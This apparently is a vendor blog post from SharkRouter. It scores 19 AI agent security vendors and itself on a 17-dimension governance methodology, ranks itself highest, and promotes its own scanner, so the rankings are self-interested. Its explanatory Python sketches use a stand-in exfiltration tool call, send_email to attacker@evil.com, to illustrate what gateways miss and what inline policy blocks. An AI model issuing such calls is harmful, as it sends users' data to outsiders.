We Scored 19 AI Security Vendors. The Market Average Is 28 Out of 100.
We published an open methodology to score AI agent governance across 17 dimensions. We scored ourselves and 19 competitors. Highest non-inline vendor: 55. Lowest: 11. Mean: 28. The results expose a 36-point architectural gap the market can't close with features.
There are over 20 vendors selling AI agent security in 2026. They all promise governance, visibility, and control. They use similar language in their pitch decks. They reference the same OWASP risks. They all claim to protect your AI agents.
We wanted to know which ones actually do.
So we built an open scoring methodology — 17 dimensions, published weights, reproducible evaluation — and scored every vendor we could find, including ourselves. The methodology is available for anyone to audit, challenge, or improve. The registry is version-controlled and refreshed when vendors ship meaningful new capabilities; the numbers in this post are from the 2026-04-10 refresh.
The results are uncomfortable.
The Scoring Framework
The Governance Score evaluates AI agent security across 17 dimensions grouped into three tiers.
Foundational controls cover the minimum viable governance: tool call interception, deny-by-default enforcement, agent identity management, data protection (PII tokenization, encryption), and audit trail integrity. Without these, there is no governance — there is monitoring.
Advanced capabilities include behavioral anomaly detection, post-execution output verification, environmental threat defense (trap detection), multi-agent governance (A2A delegation chains, taint propagation), and compliance framework mapping (EU AI Act, OWASP, MITRE ATLAS).
Operational maturity evaluates deployment flexibility (SaaS, VPC, air-gapped), onboarding friction (how long to full enforcement), adversarial testing tools (chaos engineering, penetration testing), and governance scoring transparency (do they score themselves?).
Each dimension is weighted by security impact. Tool call enforcement carries more weight than dashboard aesthetics. Cryptographic audit trails carry more weight than alerting integrations. The methodology is not designed to make any vendor look good — it is designed to identify where governance actually exists versus where marketing claims it does. We publish our own score under the same methodology and the same weights.
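Mechanically, a weighted score of this kind is just a normalized weighted average of per-dimension results. The sketch below illustrates the arithmetic only; the dimension names, weights, and results are hypothetical placeholders, not the published registry values:

```python
# Hypothetical sketch of a weighted governance score.
# Dimension names, weights, and results are illustrative placeholders,
# not the values from the published registry.
DIMENSIONS = {
    # dimension: (weight, vendor result on a 0.0-1.0 scale)
    "tool_call_enforcement": (10, 0.0),  # high-impact control, heavily weighted
    "audit_trail_integrity": (8, 0.5),
    "alerting_integrations": (2, 1.0),   # low-impact, lightly weighted
}

def governance_score(dimensions: dict) -> int:
    """Weighted average of per-dimension results, scaled to 0-100."""
    total_weight = sum(w for w, _ in dimensions.values())
    weighted = sum(w * result for w, result in dimensions.values())
    return round(100 * weighted / total_weight)

print(governance_score(DIMENSIONS))  # 30
```

Note how the vendor with perfect alerting but zero tool-call enforcement still lands at 30: heavy weights on enforcement dominate the total, which is the point of impact-based weighting.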
The Numbers (2026-04-10 registry)
| Vendor | Category | Score |
|---|---|---|
| SharkRouter | Tool-call gateway (inline) | 91 |
| Zenity | Out-of-band AI security posture | 55 |
| Wiz | Cloud security posture | 41 |
| Noma Security | Out-of-band AI security posture | 40 |
| Oasis Security | Non-human identity lifecycle | 38 |
| HiddenLayer | ML security | 34 |
| Portkey | LLM gateway | 32 |
| Protect AI (Palo Alto) | ML security | 32 |
| Lasso / Intent Security | AI security | 30 |
| Kong | API gateway | 27 |
| Robust Intelligence / Cisco | AI validation | 26 |
| Rubrik | Data recovery | 26 |
| Pangea / CrowdStrike | AI guard | 23 |
| NeuralTrust | AI security | 23 |
| Knostic | AI access control | 22 |
| Prompt Security | Prompt security | 21 |
| Cloudflare AI Gateway / Envoy | LLM gateway | 20 |
| mcp-scan / Snyk | MCP scanner | 18 |
| Lakera | Prompt security | 13 |
| aiFWall | AI firewall | 11 |
19 competitors. Mean 28. Median 26. Highest 55. Lowest 11. Full registry is in the Warden repo at warden/scanner/competitors.py — you can audit every weight yourself.
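The headline statistics are reproducible from the table above with nothing but the standard library; the list below simply transcribes the 19 competitor scores (SharkRouter excluded):

```python
from statistics import mean, median

# The 19 competitor scores from the table above (SharkRouter excluded).
scores = [55, 41, 40, 38, 34, 32, 32, 30, 27, 26, 26,
          23, 23, 22, 21, 20, 18, 13, 11]

print(len(scores))                # 19
print(round(mean(scores)))        # 28
print(median(scores))             # 26
print(max(scores), min(scores))   # 55 11
```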
The Architectural Bands
The market splits into six architectural categories. Each category has a structural ceiling on what it can achieve.
Prompt-layer vendors — Lakera (13) and Prompt Security (21). They filter text entering and exiting the LLM. They catch jailbreaks, direct prompt injection, and toxic content. Their ceiling is set by position: they cannot see tool call arguments, tool results, or agent-to-agent delegation. Prompt injection defense is necessary. It is not governance.
Out-of-band AI security posture — Zenity (55) and Noma (40). They observe agent behavior from outside the execution path. They detect anomalies, generate alerts, and produce compliance reports. Zenity is the current ceiling of this category and — critically — the highest-scoring non-inline vendor on the board. Their structural ceiling: they can detect but cannot block. By the time an alert fires, the tool call has already executed. Detection without enforcement is monitoring, not governance.
Identity & NHI lifecycle — Oasis Security (38) and Knostic (22). They manage who agents are, what they can access, and who authorized them. They are strong on identity, discovery, and access management. Their ceiling: they know who the agent is and what it's allowed to access, but they don't know what the agent is actually doing with that access. An agent with valid identity and valid permissions can still be manipulated by environmental traps.
LLM gateways & API gateways — Portkey (32), Kong (27), Cloudflare AI Gateway / Envoy (20). They route traffic between agents and LLM providers. They handle cost tracking, caching, rate limiting, and provider failover. They see the traffic but don't understand it semantically. They route `send_email(to=attacker@evil.com)` the same way they route `send_email(to=colleague@company.com)` — it's all valid API traffic.
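The distinction can be made concrete. A transport-level gateway checks that a request is well-formed; an argument-aware policy has to inspect what the call actually does. The sketch below is illustrative only; the rule format and function names are assumptions, not any vendor's real API:

```python
# Illustrative sketch: transport-level routing vs. argument-aware policy.
# Rule format and function names are assumptions, not a real vendor API.

def gateway_route(tool_call: dict) -> bool:
    """A transport-level gateway: any syntactically valid call passes."""
    return "tool" in tool_call and "args" in tool_call

def policy_check(tool_call: dict, allowed_domains: set) -> bool:
    """An argument-aware policy: inspect *what* the call does, not its shape."""
    if tool_call["tool"] == "send_email":
        domain = tool_call["args"]["to"].rsplit("@", 1)[-1]
        return domain in allowed_domains
    return False  # deny by default for tools without an explicit rule

legit = {"tool": "send_email", "args": {"to": "colleague@company.com"}}
exfil = {"tool": "send_email", "args": {"to": "attacker@evil.com"}}

print(gateway_route(legit), gateway_route(exfil))  # True True -- both are "valid traffic"
print(policy_check(legit, {"company.com"}))        # True
print(policy_check(exfil, {"company.com"}))        # False
```

Both calls are identical at the transport layer; only the argument-aware check distinguishes exfiltration from legitimate use.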
Cloud posture & AI validation — Wiz (41) and Robust Intelligence / Cisco (26). They evaluate infrastructure, scan configurations, and validate model deployments. They answer "is your AI infrastructure configured securely?" They do not answer "is your AI agent doing something it shouldn't be doing right now?"
ML security / model attack surface — HiddenLayer (34) and Protect AI / Palo Alto (32). They defend the model itself — adversarial inputs, model theft, training data poisoning. They're strong on the model attack surface, but they're not positioned to govern what the agent does with the model's output.
The Architectural Gap
The highest-scoring non-inline vendor scored 55. The market average is 28.
This is not because these vendors are poorly built. Many of them are excellent at what they do. The problem is architectural position. Each category occupies a specific position in the stack, and that position determines what they can see and what they can enforce.
No vendor that monitors from outside the execution path can block a tool call before it executes. No vendor that filters only prompts can scan tool results for hidden instructions. No vendor that manages only identity can verify that an agent's output matches its declared intent.
The gap between 55 (Zenity) and 91 (SharkRouter) is 36 points. It is not closable by adding features to existing architectures. It requires a fundamentally different position in the stack — inline, between the agent and everything it touches, with visibility into both requests and responses, tool calls and tool results, agent actions and agent context.
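The inline position described above reduces to a simple structural pattern: the governor wraps tool execution, so the policy decision happens before the side effect rather than after an alert fires. This is a structural sketch under that assumption, not SharkRouter's actual implementation:

```python
# Minimal sketch of inline enforcement: the policy decision precedes the
# side effect. Structural illustration only, not any vendor's implementation.

class Blocked(Exception):
    pass

def inline_govern(tool_fn, policy):
    """Wrap a tool so every call is checked before it executes."""
    def governed(**kwargs):
        if not policy(tool_fn.__name__, kwargs):
            raise Blocked(f"denied: {tool_fn.__name__}({kwargs})")
        result = tool_fn(**kwargs)  # the side effect happens only after approval
        # Because the governor is inline, it also sees the result, so tool
        # outputs can be scanned before they ever reach the agent.
        return result
    return governed

def send_email(to: str) -> str:
    return f"sent to {to}"

def email_policy(tool: str, kwargs: dict) -> bool:
    # Deny by default; allow only mail to the company domain.
    return tool == "send_email" and kwargs.get("to", "").endswith("@company.com")

safe_send = inline_govern(send_email, email_policy)
print(safe_send(to="colleague@company.com"))  # sent to colleague@company.com
try:
    safe_send(to="attacker@evil.com")
except Blocked:
    print("blocked before execution")
```

An out-of-band monitor observing the same two calls would log both and alert on the second; the difference is that here the second call never runs.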
Where We Score Ourselves
We published our own score: 91 out of 100. We also published where we fall short.
Cloud and platform integration: 40%. We support Docker, Kubernetes, and Helm deployment, but we don't have native integrations with every cloud provider's security tooling.
Prompt-layer security: 67%. We have SemanticGuard and LLMGuard for intent analysis, but we are not a dedicated prompt injection vendor. Dedicated prompt-layer tools score higher on pure prompt filtering — although they score lower everywhere else, which is why their total lands at 13–21.
Data recovery: 50%. WORM audit provides immutable records and cryptographic shredding handles GDPR deletion, but we don't offer full disaster recovery orchestration.
Publishing where you score low is as important as publishing where you score high. A vendor that claims 100% coverage across all dimensions is either lying or hasn't been evaluated rigorously. We explicitly don't claim 100%.
How to Use the Score
The Governance Score is not a purchasing decision. It is a diagnostic tool.
Run Warden — our open-source governance scanner — against your own environment. It evaluates your codebase, MCP configurations, agent architecture, and infrastructure against the same 17 dimensions. The output tells you where your governance gaps are, not which vendor to buy.
If your score is below 30, which is where most organizations we scan land, the first question is not "which vendor should we deploy?" The first question is "do we know how many AI agents are running in our environment right now?" Most enterprises cannot answer this question.
If your score is between 30 and 50, you likely have identity and access controls but lack enforcement. You know who your agents are. You don't know what they're doing in real time. You cannot block a tool call before it executes.
If your score is above 50, you have some inline enforcement capability. The question becomes: are you scanning tool results? Are you verifying output? Are you detecting environmental traps? Are you testing adversarially?
The Methodology Is Open
We publish the scoring methodology in full. Any vendor, researcher, or security team can evaluate themselves or evaluate us using the same framework. We welcome challenges to the weights, dimensions, or evaluation criteria — the registry is a source file in a public repository, and every score change is a commit with a rationale in the message.
The reason is simple: if the methodology is secret, it's marketing. If the methodology is open, it's a standard. The AI agent governance market needs standards, not more marketing.
Run Warden free against your own project — same 17 dimensions, same weights, same report format we use to score ourselves and every vendor in the registry:
```bash
pip install warden-ai
warden scan ./your-project --format html
```
Full registry, every vendor score, every weight, every rationale — all at github.com/SharkRouter/warden.
